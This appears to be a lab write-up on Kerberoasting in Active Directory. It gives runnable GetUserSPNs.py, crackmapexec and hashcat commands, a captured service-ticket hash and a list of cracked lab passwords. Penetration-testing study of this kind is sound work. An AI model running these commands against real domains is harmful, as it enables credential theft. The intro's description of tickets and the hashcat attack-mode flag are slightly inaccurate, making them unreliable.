Kerberoasting is a post-exploitation attack technique that attempts to crack the password of a service account within the Active Directory (AD).
In such an attack, a hacker impersonating as an account user with a service principal name (SPN) requests a ticket, which contains an encrypted password, or Kerberos. (An SPN is an attribute that ties a service to a user account within the AD). The adversary then works offline to crack the password hash, often using brute force techniques .
Once the plaintext credentials of the service account are exposed, the adversary possesses user credentials that they can use to impersonate the account owner. In so doing, they appear to be an approved and legitimate user and have unfettered access to any systems, assets or networks granted to the compromised account.
Copy GetUserSPNs.py -request -dc-ip 192.168.56.11 north.newyork.local/claudio.ortiz:babyboy -outputfile kerberoasting.hashes also do that with cme with the following command
Copy crackmapexec ldap 192.168.56.11 -u claudio.ortiz -p 'babyboy' -d north.newyork.local --kerberoasting kerberoasting.hashes let’s try to crack the hashes
Copy hashcat -m 13100 --force -a 3 '$krb5tgs$23$*elena.Lopez$NORTH.NEWYORK.LOCAL$north.newyork.local/elena.Lopez*$8b765ed876f3d1a0159b4d10bbbbaf27$113f9830edd8a28bb7fb48b5e6806f87b01c7e28c3210afec733bc174b05085c2eca711ceaa3d017f3a2f05fa935ddd04a974e4071e41245c082ef7585a14f8e3d7159edde4eed84d96f41f78161e5650c66945e37d3449000018244d0dc6537bc52c51522d3db3241d953a1ce0b3f46bb18d0ccee8b3e604956a8c495ed46e156a77f9e4af0951fd1dda438daf0f644529199fbcf3d6fbb504957801b7e6b38a043fd6b57d145908f9966462594f52d45f1d38694703d007a8163540ed62d0295f0fdef81e4c593e6e2b175e614fe88c682855d51bbfb18af7a42b043cae766c6ed81ab5e7e7c6e7a483e242214d2b02a2d3289b287da82fff03287e83f88c10029f0b5e842075d1c85eef1dabbaf57ba7981c9cfbbbed0828cd44d3ff8a26bf9e44da2dfe03ee15964991f909dc5e4fe1f403ce5fe33047b3e14c96e1e0a0970bed9dc00d8fe05afde0b5a7fb03b073b3ffe03c941d7c48b1f79d7dadade71307720db11f3d1f8471258dc78d7aaac5052f49082cc6519e4ff52aa62460c16413a18b8dc02c3a39bbc5daf96ca3694142934595bad6c69b06850361d7df6f4d1894fe65e2ab3373bcdc99209d508e8729fe780420ad6c911c52fd4a8ab33d07413869cbf7899b9ff63ea7b2a7014af0c33eeba0747e61eb23a9d0b4b49c577b0f94200c9520a176a85cc8f0348ba7150803d00fb37b401e54a9677b16a375cbc601fce688f571f4ac682a4c76b761a4104152e23d9cf207589b8e00c9243fb885b63eefcf0c6b239e8c463700918f3062c4661503bcd1d1406ced43dd8b69c5eae0c1a36d91866738efb5e1a11952a796bf337c05e6eed00f514fd8a8e46f7ce168496383a8b09cc338719e066ea8f99e298fe114dc614d7a463e279bb0859ae1cff661249881324114049fe89ed8e634812468c3b04b5a9f99cca7ce2e07e3acc8c1660e06cbb55f0f00ca6c0bce0da229e4065aea9699479deadfa57311352d3fcbfc3905c5ddbdcab0a66c0ce4d5ab3ea4dfface2fd8094862303609e61a35ef80d2dce899f83f06de349287e4659bc2b8d7dda5684c9416a45031ea912414fbc6d8e976b3f5bde5e2acb20b55bbd5ee1fd1068e6d5eb77bc5bd6200e4aba6e3afdbd243f31ea885cb5b5ec1ecb8d7ad21e89b7634cb8bfbac0f1940c75a02f1fe3acc0c8cb877ecb83663647a5dc47cc9c3b52beff1f4ffdcbb2d2729a4f4425afcaa07474b4dfefab0544cf7fa74685bc1f9ee2fbb049a77838532a83876f785894b0a3f87b1ff9636a44d2c17966a98f0237679ad383f1a23c3c3f293c662db7ee398c6c1d268e0459238154ec4564df774fe11d140adebe3c09e385cd3af7ec1e1cd601fa20226f9c2fcfc19301c4c058d849c74b0b3137a91da6a7c65a53f654eacaa48f815c9aaed533e26b5cc16894938703464a8c72a45f58000ae2a5e403a1e54fc18320b872305d399c' rockyou.txt
Copy miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1